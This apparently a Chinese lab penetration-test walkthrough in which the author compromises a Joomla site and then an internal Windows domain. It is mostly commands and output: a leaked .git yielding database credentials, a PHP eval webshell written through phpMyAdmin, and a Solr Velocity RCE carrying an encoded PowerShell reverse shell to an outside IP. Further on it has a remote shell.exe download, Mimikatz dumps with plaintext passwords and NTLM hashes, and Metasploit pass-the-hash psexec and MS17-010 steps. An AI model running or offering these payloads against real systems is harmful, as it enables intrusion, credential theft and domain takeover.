信息收集
如果觉得文章写的不错可以共同交流
http://aertyxqdp1.target.yijinglab.com/
dirsearch
dirsearch -u "http://aertyxqdp1.target.yijinglab.com/"
发现
http://aertyxqdp1.target.yijinglab.com/joomla/
http://aertyxqdp1.target.yijinglab.com/phpMyAdmin/
http://aertyxqdp1.target.yijinglab.com/joomla/.git
漏洞探测
Githack获取源码
python GitHack.py http://aertyxqdp1.target.yijinglab.com/joomla/.git
获取到源码
public $user = 'root';
public $password = 'yijing666mingyyiyeryi666';
public $log_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\administrator/logs';
public $tmp_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla/tmp';
漏洞利用
登录phpmyadmin,写webshell
show global variables like "secure%";
select '<?php eval($_POST["pwd"]); ?>' into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\shelld41d8cd98f00b204.php';
查看权限
写webshell
链接
信息收集
Windows IP 配置
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . : openstacklocal
本地链接 IPv6 地址. . . . . . . . : fe80::4d4:61aa:24be:fb73%11
IPv4 地址 . . . . . . . . . . . . : 172.16.36.63
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.16.36.254
隧道适配器 isatap.openstacklocal:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . : openstacklocal
whoami
net time /domain
不在域内
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:329153f560eb329c0e1deea55e88a1e9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator
root
内网转发
fscan简单扫扫
上传代理
http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php
python neoreg.py -u http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php -k 123456789
solr站点
看core
内网渗透
命令执行
http://172.16.36.133:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27powershell.exe%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAOAAyAC4AMQA1ADcALgAxADcAMwAuADEAMQAyACIALAA1ADAANQA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
在82.157.173.112服务器上
nc -lvnp 5056
反弹成功
同层2个机器
172.16.36.63
172.16.36.133 (双网卡)
在172.16.36.133信息收集发现172.16段
下msf马
swift
$p = new-object system.net.webclient
$p.downloadfile("http://82.157.173.112:8081/shell.exe","shell.exe")
反弹
80机器(在域内)
net time /domain
传fscan
扫描172.16.16.0/24
f.exe -h 172.16.16.0/24 -o r16.txt
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.16.16.1 is alive
(icmp) Target 172.16.16.33 is alive
(icmp) Target 172.16.16.80 is alive
(icmp) Target 172.16.16.189 is alive
[*] Icmp alive hosts len is: 4
172.16.16.80:139 open
172.16.16.189:445 open
172.16.16.33:445 open
172.16.16.80:445 open
172.16.16.189:139 open
172.16.16.33:139 open
172.16.16.189:135 open
172.16.16.80:21 open
172.16.16.189:88 open
172.16.16.80:80 open
172.16.16.33:135 open
172.16.16.80:135 open
172.16.16.80:8983 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.16.16.189
[->]WIN-MVNE1SFJ0LQ
[->]172.16.16.189
[*] WebTitle: http://172.16.16.80 code:200 len:689 title:IIS7
[+] 172.16.16.80 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.16.16.189 MS17-010 (Windows Server 2012 R2 Standard 9600)
[*] NetInfo:
[*]172.16.16.33
[->]WIN-T02F2T5601J
[->]172.16.16.33
[*] NetBios: 172.16.16.33 WIN-T02F2T5601J.dog.local Windows Server 2016 Standard 14393
[*] WebTitle: http://172.16.16.80:8983 code:302 len:0 title:None 跳转url: http://172.16.16.80:8983/solr/
[*] WebTitle: http://172.16.16.80:8983/solr/ code:200 len:14887 title:Solr Admin
[+] http://172.16.16.80:8983 poc-yaml-solr-velocity-template-rce
已完成 13/13
[*] 扫描结束,耗时: 18.0771485s
综上
172.16.16.189 是域控
域名是dog.local
net view /domain:dog
域内还有有172.16.16.33这个机器
在80机器上加载kiwi
kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 1190960344 (00000000:46fc9cd8)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/12 0:09:46
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
* Username : Administrator
* Domain : DOG
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1186680366 (00000000:46bb4e2e)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/12 0:08:00
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : cf28dfb90f2faa3f856b4f2fa1d55fe9
tspkg :
* Username : Administrator
* Domain : DOG
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1177681477 (00000000:4631fe45)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/12 0:04:07
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
* Username : Administrator
* Domain : DOG
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1169604964 (00000000:45b6c164)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/12 0:00:36
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
* Username : Administrator
* Domain : DOG
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 20558839 (00000000:0139b3f7)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 13:00:15
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : SOLR
* NTLM : 161cff084477fe596a5db81874498a24
tspkg :
* Username : Administrator
* Domain : SOLR
* Password : (null)
wdigest :
* Username : Administrator
* Domain : SOLR
* Password : (null)
kerberos :
* Username : Administrator
* Domain : SOLR
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 20364385 (00000000:0136bc61)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 12:57:41
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : SOLR
* NTLM : 161cff084477fe596a5db81874498a24
tspkg :
* Username : Administrator
* Domain : SOLR
* Password : (null)
wdigest :
* Username : Administrator
* Domain : SOLR
* Password : (null)
kerberos :
* Username : Administrator
* Domain : SOLR
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 12666668 (00000000:00c1472c)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 10:35:42
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
* Username : Administrator
* Domain : DOG
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 12437392 (00000000:00bdc790)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 10:31:28
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
* Username : Administrator
* Domain : DOG
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10819842 (00000000:00a51902)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 10:14:05
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
* Username : Administrator
* Domain : DOG
* Password : (null)
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 9333731 (00000000:008e6be3)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 9:50:00
SID : S-1-5-18
msv :
[00000003] Primary
* Username : administrator
* Domain : WIN-T02F2T5601J
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : administrator
* Domain : WIN-T02F2T5601J
* Password : 1qaz@WSX
wdigest :
* Username : administrator
* Domain : WIN-T02F2T5601J
* Password : 1qaz@WSX
kerberos :
* Username : administrator
* Domain : WIN-T02F2T5601J
* Password : 1qaz@WSX
ssp :
credman :
Authentication Id : 0 ; 7246833 (00000000:006e93f1)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 9:36:41
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : SOLR
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : Administrator
* Domain : SOLR
* Password : 1qaz@WSX
wdigest :
* Username : Administrator
* Domain : SOLR
* Password : 1qaz@WSX
kerberos :
* Username : Administrator
* Domain : SOLR
* Password : 1qaz@WSX
ssp :
credman :
Authentication Id : 0 ; 6122549 (00000000:005d6c35)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 9:20:48
SID : S-1-5-18
msv :
[00000003] Primary
* Username : administrator
* Domain : SOLR
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : administrator
* Domain : SOLR
* Password : 1qaz@WSX
wdigest :
* Username : administrator
* Domain : SOLR
* Password : 1qaz@WSX
kerberos :
* Username : administrator
* Domain : SOLR
* Password : 1qaz@WSX
ssp :
credman :
Authentication Id : 0 ; 342819 (00000000:00053b23)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2024/4/11 7:47:09
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : SOLR$
* Domain : DOG
* NTLM : fe1b9cb384f267f3bf2bb9192d927910
* SHA1 : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
tspkg :
* Username : SOLR$
* Domain : DOG
* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
wdigest :
* Username : SOLR$
* Domain : DOG
* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
kerberos :
* Username : SOLR$
* Domain : dog.local
* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
ssp :
credman :
Authentication Id : 0 ; 136069 (00000000:00021385)
Session : Interactive from 1
User Name : Administrator
Domain : SOLR
Logon Server : SOLR
Logon Time : 2024/4/11 7:45:17
SID : S-1-5-21-2356296415-3603686952-1554484469-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SOLR
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : Administrator
* Domain : SOLR
* Password : 1qaz@WSX
wdigest :
* Username : Administrator
* Domain : SOLR
* Password : 1qaz@WSX
kerberos :
* Username : Administrator
* Domain : SOLR
* Password : 1qaz@WSX
ssp :
[00000000]
* Username : administrator
* Domain : (null)
* Password : 1qaz@WSX
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 7:45:06
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 7:44:45
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SOLR$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/11 7:44:45
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SOLR$
* Domain : DOG
* NTLM : fe1b9cb384f267f3bf2bb9192d927910
* SHA1 : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
tspkg :
wdigest :
* Username : SOLR$
* Domain : DOG
* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
kerberos :
* Username : solr$
* Domain : DOG.LOCAL
* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
ssp :
credman :
Authentication Id : 0 ; 33980 (00000000:000084bc)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/4/11 7:44:42
SID :
msv :
[00000003] Primary
* Username : SOLR$
* Domain : DOG
* NTLM : fe1b9cb384f267f3bf2bb9192d927910
* SHA1 : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SOLR$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/11 7:44:41
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SOLR$
* Domain : DOG
* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
kerberos :
* Username : solr$
* Domain : DOG.LOCAL
* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
ssp :
credman :
其他获取的密码
攻击内网主机
哈希传递打33机器
use windows/smb/ms17_010_psexec
set smbuser administrator
set SMBDomain dog.local
set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2
成功反弹
切换下路由哈希传递打189
use exploit/windows/smb/psexec
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2
读取189密码
ipconfig
33的密码
Authentication Id : 0 ; 243527 (00000000:0003b747)
Session : Interactive from 1
User Name : Administrator
Domain : WIN-T02F2T5601J
Logon Server : WIN-T02F2T5601J
Logon Time : 2024/4/11 9:01:45
SID : S-1-5-21-1188958703-4046475421-80252671-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : WIN-T02F2T5601J
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
wdigest :
* Username : Administrator
* Domain : WIN-T02F2T5601J
* Password : (null)
kerberos :
* Username : Administrator
* Domain : WIN-T02F2T5601J
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 40882 (00000000:00009fb2)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/4/11 8:57:53
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-T02F2T5601J$
* Domain : DOG
* NTLM : 1b45f9595e69e9c3b6c4638a9eb93742
* SHA1 : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
tspkg :
wdigest :
* Username : WIN-T02F2T5601J$
* Domain : DOG
* Password : (null)
kerberos :
* Username : WIN-T02F2T5601J$
* Domain : dog.local
* Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-T02F2T5601J$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/11 8:57:51
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-T02F2T5601J$
* Domain : DOG
* NTLM : 1b45f9595e69e9c3b6c4638a9eb93742
* SHA1 : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
tspkg :
wdigest :
* Username : WIN-T02F2T5601J$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-t02f2t5601j$
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 21095 (00000000:00005267)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/4/11 8:57:48
SID :
msv :
[00000003] Primary
* Username : WIN-T02F2T5601J$
* Domain : DOG
* NTLM : 1b45f9595e69e9c3b6c4638a9eb93742
* SHA1 : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 2678848 (00000000:0028e040)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 13:07:39
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 2641030 (00000000:00284c86)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 13:01:37
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : WIN-T02F2T5601J
* NTLM : 161cff084477fe596a5db81874498a24
tspkg :
wdigest :
* Username : Administrator
* Domain : WIN-T02F2T5601J
* Password : (null)
kerberos :
* Username : Administrator
* Domain : WIN-T02F2T5601J
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 2617925 (00000000:0027f245)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 12:59:03
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : SOLR
* NTLM : 161cff084477fe596a5db81874498a24
tspkg :
wdigest :
* Username : Administrator
* Domain : SOLR
* Password : (null)
kerberos :
* Username : Administrator
* Domain : SOLR
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1758011 (00000000:001ad33b)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 9:56:43
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1550764 (00000000:0017a9ac)
Session : NewCredentials from 0
User Name : SYSTEM
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 9:54:13
SID : S-1-5-18
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
tspkg :
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 504399 (00000000:0007b24f)
Session : Interactive from 2
User Name : administrator
Domain : DOG
Logon Server : WIN-MVNE1SFJ0LQ
Logon Time : 2024/4/11 9:11:41
SID : S-1-5-21-2515766443-2959740750-3575737072-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
* SHA1 : 6aec174b0d46521c233a254120538a6bddecc0c7
* DPAPI : cf28dfb90f2faa3f856b4f2fa1d55fe9
tspkg :
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 488613 (00000000:000774a5)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/4/11 9:10:45
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-T02F2T5601J$
* Domain : DOG
* NTLM : 1b45f9595e69e9c3b6c4638a9eb93742
* SHA1 : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
tspkg :
wdigest :
* Username : WIN-T02F2T5601J$
* Domain : DOG
* Password : (null)
kerberos :
* Username : WIN-T02F2T5601J$
* Domain : dog.local
* Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/11 8:57:54
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-T02F2T5601J$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/11 8:57:48
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-T02F2T5601J$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-t02f2t5601j$
* Domain : DOG.LOCAL
* Password : (null)
ssp :
credman :
189的密码
kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 40540132 (00000000:026a97e4)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/4/11 11:49:36
SID : S-1-5-90-2
msv :
[00000003] Primary
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* NTLM : 94901a951ee2d32e070982b4276eebd6
* SHA1 : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : dog.local
* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2
ssp : KO
credman :
Authentication Id : 0 ; 55884 (00000000:0000da4c)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/4/3 7:15:12
SID : S-1-5-90-1
msv :
[00000003] Primary
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* NTLM : 5f82695a422af9105af8c29caa8406e6
* SHA1 : 21fa78c558159124c9f55b1ab891d0426f2ee246
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : dog.local
